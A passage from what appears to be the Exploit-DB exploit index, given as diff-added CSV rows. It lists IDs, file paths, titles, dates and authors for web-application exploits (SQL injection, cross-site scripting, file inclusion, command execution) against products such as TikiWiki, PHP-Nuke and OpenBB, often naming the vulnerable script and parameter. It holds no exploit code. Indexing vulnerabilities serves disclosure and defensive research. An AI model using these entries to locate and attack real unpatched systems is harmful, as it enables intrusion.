'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",webapps,php, +23699,exploits/php/webapps/23699.txt,"AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",webapps,php, +23702,exploits/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",webapps,asp, +23703,exploits/asp/webapps/23703.txt,"ProductCart 1.x/2.x - 'advSearch_h.asp' Multiple SQL Injections",2004-02-16,"Nick Gudov",webapps,asp, +23704,exploits/asp/webapps/23704.txt,"ProductCart 1.x/2.x - 'Custva.asp?redirectUrl' Cross-Site Scripting",2004-02-16,"Nick Gudov",webapps,asp, +23705,exploits/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - 'gotopage.cgi' Traversal Arbitrary File Access",2004-02-16,G00db0y,webapps,cgi, +23706,exploits/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,webapps,cgi, +23710,exploits/php/webapps/23710.txt,"YABB SE 1.5 - 'Quote' SQL Injection",2004-02-16,BaCkSpAcE,webapps,php, +23711,exploits/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php?id' SQL Injection",2003-02-17,"David Sopas Ferreira",webapps,php, +23712,exploits/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php' Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",webapps,php, +23718,exploits/php/webapps/23718.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop.php?cat' SQL Injection",2004-02-18,G00db0y,webapps,php, +23719,exploits/php/webapps/23719.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop_by_brand.php?cat_manufacturer' SQL Injection",2004-02-18,G00db0y,webapps,php, +23720,exploits/php/webapps/23720.txt,"eCommerce Corporation Online Store Kit 3.0 - 'listing.php?id' SQL Injection",2004-02-18,G00db0y,webapps,php, +23722,exploits/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - 'multiplechoice/index.php' Arbitrary File Access",2004-02-18,G00db0y,webapps,php, +23723,exploits/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 - 'glossary.php' Arbitrary File Access",2004-02-18,G00db0y,webapps,php, +23724,exploits/php/webapps/23724.txt,"Fool's Workshop Owl's Workshop 1.0 - 'newmultiplechoice.php' Arbitrary File Access",2004-02-18,G00db0y,webapps,php, +23725,exploits/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 - '/glossaries/index.php?File' Arbitrary File Access",2004-02-18,G00db0y,webapps,php, +23726,exploits/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 - 'readings/index.php' Arbitrary File Access",2004-02-18,G00db0y,webapps,php, +23727,exploits/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 - 'resultsignore.php' Arbitrary File Access",2004-02-18,G00db0y,webapps,php, +23729,exploits/asp/webapps/23729.txt,"WebCortex WebStores2000 - 'error.asp' Cross-Site Scripting",2004-02-18,"Nick Gudov",webapps,asp, +23742,exploits/php/webapps/23742.txt,"phpNewsManager 1.36 - functions Script File Disclosure",2004-02-23,G00db0y,webapps,php, +23744,exploits/php/webapps/23744.txt,"EZBoard 7.3 - Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",webapps,php, +23745,exploits/php/webapps/23745.txt,"XMB Forum 1.8 - 'u2uadmin.php?uid' Cross-Site Scripting",2004-02-23,"Janek Vind",webapps,php, +23746,exploits/php/webapps/23746.txt,"XMB Forum 1.8 - 'editprofile.php?user' Cross-Site Scripting",2004-02-23,"Janek Vind",webapps,php, +23747,exploits/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting",2004-02-23,"Janek Vind",webapps,php, +23748,exploits/php/webapps/23748.txt,"XMB Forum 1.8 - 'forumdisplay.php' Multiple SQL Injections",2004-02-23,"Janek Vind",webapps,php, +23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php, +23753,exploits/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",webapps,php, +23767,exploits/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",webapps,php, +23770,exploits/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 - SQL Injection",2004-03-01,"David Sopas Ferreira",webapps,php, +23773,exploits/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",webapps,php, +23774,exploits/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak & BackSpace",webapps,php, +23775,exploits/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple SQL Injections",2004-03-01,"Alnitak & BackSpace",webapps,php, +23781,exploits/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php?posthash' Blind SQL Injection",2012-12-31,"Joshua Rogers",webapps,php, +23782,exploits/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Blind SQL Injection",2012-12-31,Red-D3v1L,webapps,php, +24047,exploits/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,webapps,php, +24048,exploits/php/webapps/24048.txt,"Protector System 1.15 - 'blocker_query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-23,waraxe,webapps,php, +24046,exploits/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,webapps,php, +23791,exploits/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",webapps,asp, +23792,exploits/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x (Multiple Modules) - Cross-Site Scripting",2004-03-05,"Rafel Ivgi The-Insider",webapps,php, +23795,exploits/php/webapps/23795.txt,"Invision Power Board 1.3 - 'Pop' Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",webapps,php, +23797,exploits/php/webapps/23797.txt,"Confixx 2 - 'DB' SQL Injection",2004-03-09,wkr,webapps,php, +23798,exploits/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution",2004-03-09,wkr,webapps,php, +40402,exploits/php/webapps/40402.pl,"VegaDNS 0.13.2 - Remote Command Injection",2016-09-20,Wireghoul,webapps,php, +23806,exploits/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - 'dir' Cross-Site Scripting",2004-03-12,Fable,webapps,cgi, +23807,exploits/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",webapps,cgi, +23809,exploits/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 - nit.emu Information Disclosure",2004-03-12,dr_insane,webapps,cgi, +23810,exploits/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 - 'emumail.fcgi' Multiple Cross-Site Scripting Vulnerabilities",2004-03-12,dr_insane,webapps,cgi, +23812,exploits/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",webapps,php, +23813,exploits/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",webapps,asp, +23814,exploits/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - 'fname' Cross-Site Scripting",2004-03-15,"Janek Vind",webapps,php, +23815,exploits/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php?basepath' Remote File Inclusion",2004-03-15,"Janek Vind",webapps,php, +23816,exploits/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - 'modules.php?gid' SQL Injection",2004-03-15,"Janek Vind",webapps,php, +23817,exploits/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - 'nmimage.php?z' Cross-Site Scripting",2004-03-15,"Janek Vind",webapps,php, +23818,exploits/php/webapps/23818.txt,"Phorum 3.x - 'register.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,webapps,php, +23819,exploits/php/webapps/23819.txt,"Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,webapps,php, +23820,exploits/php/webapps/23820.txt,"Phorum 3.x - 'profile.php?target' Cross-Site Scripting",2004-03-15,JeiAr,webapps,php, +23821,exploits/php/webapps/23821.php,"phpBB 1.x/2.0.x - 'search.php?search_results' SQL Injection",2004-01-04,pokleyzz,webapps,php, +23822,exploits/php/webapps/23822.txt,"vBulletin 3.0 - 'forumdisplay.php' Cross-Site Scripting",2004-03-16,JeiAr,webapps,php, +23823,exploits/php/webapps/23823.txt,"vBulletin 3.0 - 'showthread.php' Cross-Site Scripting",2004-03-16,JeiAr,webapps,php, +23824,exploits/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-16,JeiAr,webapps,php, +23825,exploits/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php?mos_change_template' Cross-Site Scripting",2004-03-16,JeiAr,webapps,php, +23828,exploits/php/webapps/23828.txt,"e107 1.0.1 - Arbitrary JavaScript Execution (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",webapps,php, +23829,exploits/php/webapps/23829.txt,"e107 1.0.2 - SQL Injection (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",webapps,php, +23831,exploits/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution",2013-01-02,xistence,webapps,php, +23834,exploits/php/webapps/23834.txt,"Mambo Open Source 4.5 - 'index.php' SQL Injection",2004-03-16,JeiAr,webapps,php, +23835,exploits/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",webapps,php, +23843,exploits/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",webapps,php, +23844,exploits/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php?language' Full Path Disclosure",2004-03-18,"Janek Vind",webapps,php, +23845,exploits/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-18,"Janek Vind",webapps,php, +23851,exploits/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - 'news_view.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",webapps,asp, +23852,exploits/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - 'resend.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",webapps,asp, +23853,exploits/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - 'error.asp?err' Cross-Site Scripting",2004-03-20,"Manuel Lopez",webapps,asp, +40401,exploits/php/webapps/40401.txt,"ZineBasic 1.1 - Arbitrary File Disclosure",2016-09-19,bd0rk,webapps,php,80 +23854,exploits/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - 'register.asp?err' Cross-Site Scripting",2004-03-20,"Manuel Lopez",webapps,asp, +23857,exploits/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - 'comment_add.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",webapps,asp, +23858,exploits/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - 'search.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",webapps,asp, +23859,exploits/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 - 'category_news_headline.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",webapps,asp, +23860,exploits/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 - 'more.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",webapps,asp, +23861,exploits/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 - 'category_news.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",webapps,asp, +23862,exploits/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - 'news_sort.asp?filter' SQL Injection",2004-03-20,"Manuel Lopez",webapps,asp, +23863,exploits/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - 'NEWS_LOGIN?admin' Cookie Authentication Bypass",2004-03-20,"Manuel Lopez",webapps,asp, +23865,exploits/php/webapps/23865.txt,"vBulletin 2.x - 'private.php' Cross-Site Scripting",2004-03-22,JeiAr,webapps,php, +23866,exploits/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,webapps,php, +23867,exploits/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injections",2004-03-23,JeiAr,webapps,php, +23868,exploits/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - 'id' SQL Injection",2004-03-22,JeiAr,webapps,php, +23869,exploits/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",webapps,php, +23870,exploits/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",webapps,php, +23872,exploits/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,webapps,jsp, +23875,exploits/windows/webapps/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",webapps,windows, +23885,exploits/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - 'showgallery.php' Multiple SQL Injections",2004-03-29,JeiAr,webapps,php, +23886,exploits/windows/webapps/23886.txt,"Simple Web Server 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",webapps,windows, +23888,exploits/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,webapps,php, +23890,exploits/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x - HTML Injection",2004-03-29,"koi8-r Shelz",webapps,cgi, +23891,exploits/asp/webapps/23891.txt,"Alan Ward A-CART 2.0 - 'category.asp?catcode' SQL Injection (2)",2004-03-29,"Manuel Lopez",webapps,asp, +23894,exploits/cgi/webapps/23894.txt,"Cloisterblog 1.2.2 - Journal.pl Directory Traversal",2004-03-29,Dotho,webapps,cgi, +23895,exploits/asp/webapps/23895.txt,"Interchange 4.8.x/5.0 - Remote Information Disclosure",2004-03-30,anonymous,webapps,asp, +23897,exploits/cgi/webapps/23897.txt,"LinBit Technologies LINBOX Officeserver - Remote Authentication Bypass",2004-03-30,"Martin Eiszner",webapps,cgi, +23898,exploits/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection",2004-03-31,"Nick Gudov",webapps,asp, +23899,exploits/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting",2004-03-31,"Nick Gudov",webapps,asp, +23901,exploits/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",webapps,php, +23907,exploits/cgi/webapps/23907.pl,"Aborior Encore Web Forum - Arbitrary Command Execution",2004-04-03,K-159,webapps,cgi, +23908,exploits/php/webapps/23908.txt,"OpenBB 1.0.6 - 'myhome.php' SQL Injection",2004-04-05,"Mark Tesn",webapps,php, +23913,exploits/cgi/webapps/23913.txt,"FloosieTek FTGate Mail Server 1.2 - 'index.fts?folder' Cross-Site Scripting",2004-04-06,dr_insane,webapps,cgi, +23914,exploits/cgi/webapps/23914.txt,"FloosieTek FTGate Mail Server 1.2 - Full Path Disclosure",2004-04-06,dr_insane,webapps,cgi, +23924,exploits/multiple/webapps/23924.txt,"Nexpose Security Console - Cross-Site Request Forgery",2013-01-06,"Robert Gilbert",webapps,multiple, +23928,exploits/php/webapps/23928.txt,"NukeCalendar 1.1.a - 'modules.php' Full Path Disclosure",2004-04-08,"Janek Vind",webapps,php, +23929,exploits/php/webapps/23929.txt,"NukeCalendar 1.1.a - 'block-calendar.php' Full Path Disclosure",2004-04-08,"Janek Vind",webapps,php, +23930,exploits/php/webapps/23930.txt,"NukeCalendar 1.1.a - 'block-Calendar1.php' Full Path Disclosure",2004-04-08,"Janek Vind",webapps,php, +23931,exploits/php/webapps/23931.txt,"NukeCalendar 1.1.a - 'block-Calendar_center.php' Full Path Disclosure",2004-04-08,"Janek Vind",webapps,php, +23932,exploits/php/webapps/23932.txt,"NukeCalendar 1.1.a - 'eid' Cross-Site Scripting",2004-04-08,"Janek Vind",webapps,php, +23933,exploits/php/webapps/23933.txt,"NukeCalendar 1.1.a - 'eid' SQL Injection",2004-04-08,"Janek Vind",webapps,php, +23934,exploits/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 - 'index.php?language' Cross-Site Scripting",2004-04-07,"Janek Vind",webapps,php, +23935,exploits/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 - 'view.php?id' Cross-Site Scripting",2004-04-07,"Janek Vind",webapps,php, +23937,exploits/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 - viewmail.tagz Cross-Site Scripting",2004-04-08,dr_insane,webapps,cgi, +23938,exploits/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 - Index Cross-Site Scripting",2004-04-08,dr_insane,webapps,cgi, +23939,exploits/cgi/webapps/23939.txt,"1st Class Mail Server 4.0 1 - members.tagz Cross-Site Scripting",2004-04-08,dr_insane,webapps,cgi, +23940,exploits/cgi/webapps/23940.txt,"1st Class Mail Server 4.0 1 - general.tagz Cross-Site Scripting",2004-04-08,dr_insane,webapps,cgi, +23941,exploits/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 - advanced.tagz Cross-Site Scripting",2004-04-08,dr_insane,webapps,cgi, +23942,exploits/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 - list.tagz Cross-Site Scripting",2004-04-08,dr_insane,webapps,cgi, +23947,exploits/php/webapps/23947.txt,"TikiWiki Project 1.8 - 'tiki-switch_theme.php?theme' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23948,exploits/php/webapps/23948.txt,"TikiWiki Project 1.8 - 'img/wiki_up' Arbitrary File Upload",2004-04-12,JeiAr,webapps,php, +23949,exploits/php/webapps/23949.txt,"TikiWiki Project 1.8 - 'tiki-map.phtml' Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,webapps,php, +23950,exploits/php/webapps/23950.txt,"TikiWiki Project 1.8 - User Profile Multiple Option Remote Code Injections",2004-04-12,JeiAr,webapps,php, +23951,exploits/php/webapps/23951.txt,"TikiWiki Project 1.8 - Add Site Multiple Options Remote Code Injections",2004-04-12,JeiAr,webapps,php, +23952,exploits/php/webapps/23952.txt,"TikiWiki Project 1.8 - 'categorize.php' Direct Request Full Path Disclosure",2004-04-12,JeiAr,webapps,php, +23953,exploits/php/webapps/23953.txt,"TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,webapps,php, +23954,exploits/php/webapps/23954.txt,"TikiWiki Project 1.8 - 'messu-read.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,webapps,php, +23955,exploits/php/webapps/23955.txt,"TikiWiki Project 1.8 - 'tiki-read_article.php?articleId' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23956,exploits/php/webapps/23956.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php?parentId' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23957,exploits/php/webapps/23957.txt,"TikiWiki Project 1.8 - 'tiki-index.php?comments_threshold' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23958,exploits/php/webapps/23958.txt,"TikiWiki Project 1.8 - 'tiki-print_article.php?articleId' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23959,exploits/php/webapps/23959.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php?galleryID' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23960,exploits/php/webapps/23960.txt,"TikiWiki Project 1.8 - 'tiki-upload_file.php?galleryID' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23961,exploits/php/webapps/23961.txt,"TikiWiki Project 1.8 - 'tiki-view_faq.php?faqId' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23962,exploits/php/webapps/23962.txt,"TikiWiki Project 1.8 - 'tiki-view_chart.php?chartId' Cross-Site Scripting",2004-04-12,JeiAr,webapps,php, +23963,exploits/php/webapps/23963.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23964,exploits/php/webapps/23964.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23965,exploits/php/webapps/23965.txt,"TikiWiki Project 1.8 - 'tiki-directory_ranking.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23966,exploits/php/webapps/23966.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23967,exploits/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injections",2013-01-08,cr4wl3r,webapps,php, +23968,exploits/asp/webapps/23968.txt,"Advantech Webaccess HMI/SCADA Software - Persistence Cross-Site Scripting",2013-01-08,"SecPod Research",webapps,asp, +23970,exploits/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure (Metasploit)",2013-01-08,Metasploit,webapps,php, +23971,exploits/php/webapps/23971.txt,"TikiWiki Project 1.8 - 'tiki-index.php?comments_offset & offset' SQL Injections",2004-04-12,JeiAr,webapps,php, +23972,exploits/php/webapps/23972.txt,"TikiWiki Project 1.8 - 'tiki-user_tasks.php?offset & sort_mode' SQL Injections",2004-04-12,JeiAr,webapps,php, +23973,exploits/php/webapps/23973.txt,"TikiWiki Project 1.8 - 'tiki-directory_search.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23974,exploits/php/webapps/23974.txt,"TikiWiki Project 1.8 - 'tiki-file_galleries.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23975,exploits/php/webapps/23975.txt,"TikiWiki Project 1.8 - 'tiki-list_faqs.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23976,exploits/php/webapps/23976.txt,"TikiWiki Project 1.8 - 'tiki-list_trackers.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23977,exploits/php/webapps/23977.txt,"TikiWiki Project 1.8 - 'tiki-list_blogs.php?sort_mode' SQL Injection",2004-04-12,JeiAr,webapps,php, +23978,exploits/php/webapps/23978.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php?offset' SQL Injection",2004-04-12,JeiAr,webapps,php, +33401,exploits/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Cross-Site Scripting",2009-12-14,bi0,webapps,php, +23982,exploits/php/webapps/23982.txt,"TikiWiki Project 1.8 - 'tiki-list_faqs.php?offset' SQL Injection",2004-04-12,JeiAr,webapps,php, +23983,exploits/php/webapps/23983.txt,"TikiWiki Project 1.8 - 'tiki-list_trackers.php?offset' SQL Injection",2004-04-12,JeiAr,webapps,php, +23984,exploits/php/webapps/23984.txt,"TikiWiki Project 1.8 - 'tiki-list_blogs.php?offset' SQL Injection",2004-04-12,JeiAr,webapps,php, +23986,exploits/cgi/webapps/23986.txt,"BlackBoard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,"DarC KonQuest",webapps,cgi, +23988,exploits/php/webapps/23988.txt,"Nuked-klaN 1.x - Multiple Vulnerabilities",2004-04-12,frog,webapps,php, +23990,exploits/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x - CookieDecode Cross-Site Scripting",2004-04-13,waraxe,webapps,php, +23991,exploits/php/webapps/23991.txt,"Tutos 1.1.20031017 - 'note_overview.php?id' SQL Injection",2004-04-13,"François SORIN",webapps,php, +23998,exploits/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injections",2004-04-13,waraxe,webapps,php, +23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php, +23994,exploits/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,cr4wl3r,webapps,php, +23995,exploits/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G - Directory Traversal",2013-01-09,"Dhruv Shah",webapps,hardware, +23997,exploits/php/webapps/23997.txt,"WeBid 1.0.6 - SQL Injection",2013-01-09,"Life Wasted",webapps,php, +24001,exploits/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 - Cross-Site Scripting",2004-04-14,"Noam Rathaus",webapps,cgi, +24003,exploits/php/webapps/24003.txt,"phpBugTracker 0.9 - 'query.php' Multiple SQL Injections",2004-04-15,JeiAr,webapps,php, +24004,exploits/php/webapps/24004.txt,"phpBugTracker 0.9 - 'bug.php' Multiple SQL Injections",2004-04-15,JeiAr,webapps,php, +24005,exploits/php/webapps/24005.txt,"phpBugTracker 0.9 - 'bug.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-15,JeiAr,webapps,php, +24006,exploits/php/webapps/24006.txt,"phpBugTracker 0.9 - 'query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-15,JeiAr,webapps,php, +24007,exploits/php/webapps/24007.txt,"phpBugTracker 0.9 - 'user.php?bugid' Cross-Site Scripting",2004-04-15,JeiAr,webapps,php, +24008,exploits/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",webapps,php, +24009,exploits/php/webapps/24009.txt,"Gemitel 3.50 - '/affich.php' Remote File Inclusion / Command Injection",2004-04-15,jaguar,webapps,php, +24016,exploits/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",webapps,php, +24026,exploits/php/webapps/24026.txt,"phpBB 2.0.x - 'album_portal.php' Remote File Inclusion",2004-04-19,Officerrr,webapps,php, +24034,exploits/php/webapps/24034.txt,"PHProfession 2.5 - 'modules.php?offset' SQL Injection",2004-04-23,"Janek Vind",webapps,php, +24035,exploits/php/webapps/24035.txt,"PHProfession 2.5 - 'upload.php' Direct Request Full Path Disclosure",2004-04-23,"Janek Vind",webapps,php, +24036,exploits/php/webapps/24036.txt,"PHProfession 2.5 - 'modules.php?jcode' Cross-Site Scripting",2004-04-23,"Janek Vind",webapps,php, +24037,exploits/php/webapps/24037.txt,"PostNuke Phoenix 0.726 - 'openwindow.php?hlpfile' Cross-Site Scripting",2004-04-21,"Janek Vind",webapps,php, +24039,exploits/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 Beta - Database Disclosure",2004-04-22,CyberTal0n,webapps,asp, +24044,exploits/php/webapps/24044.txt,"PHPLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,webapps,php, +24049,exploits/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - 'Ver.asp' Information Disclosure",2004-04-23,CyberTalon,webapps,asp, +24050,exploits/php/webapps/24050.txt,"Advanced Guestbook 2.2 - 'Password' SQL Injection",2004-04-23,JQ,webapps,php, +24052,exploits/php/webapps/24052.txt,"OpenBB 1.0.x - 'member.php?redirect' Cross-Site Scripting",2004-04-26,JeiAr,webapps,php, +24053,exploits/php/webapps/24053.txt,"OpenBB 1.0.x - 'myhome.php?to' Cross-Site Scripting",2004-04-26,JeiAr,webapps,php, +24054,exploits/php/webapps/24054.txt,"OpenBB 1.0.x - 'post.php?TID' Cross-Site Scripting",2004-04-26,JeiAr,webapps,php, +24055,exploits/php/webapps/24055.txt,"OpenBB 1.0.x - 'index.php?redirect' Cross-Site Scripting",2004-04-26,JeiAr,webapps,php, +24056,exploits/php/webapps/24056.txt,"OpenBB 1.0.x - 'board.php?FID' SQL Injection",2004-04-26,JeiAr,webapps,php, +24057,exploits/php/webapps/24057.txt,"OpenBB 1.0.x - 'member.php' Multiple SQL Injections",2004-04-26,JeiAr,webapps,php, +24058,exploits/php/webapps/24058.txt,"OpenBB 1.0.x - 'search.php?q' SQL Injection",2004-04-26,JeiAr,webapps,php, +24059,exploits/php/webapps/24059.txt,"OpenBB 1.0.x - 'post.php' Multiple SQL Injections",2004-04-26,JeiAr,webapps,php, +24060,exploits/php/webapps/24060.txt,"PHP-Nuke 7.2 Multiple Video Gallery Module - SQL Injection",2004-04-26,"k1LL3r B0y",webapps,php, +24061,exploits/php/webapps/24061.txt,"OpenBB 1.0.x - Private Message Disclosure",2004-04-26,"Manuel Lopez",webapps,php, +24068,exploits/php/webapps/24068.txt,"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting",2004-04-30,"Alvin Alex",webapps,php, +24071,exploits/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",webapps,php, +24072,exploits/php/webapps/24072.txt,"Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting",2004-04-30,"Janek Vind",webapps,php, +24073,exploits/php/webapps/24073.txt,"Coppermine Photo Gallery 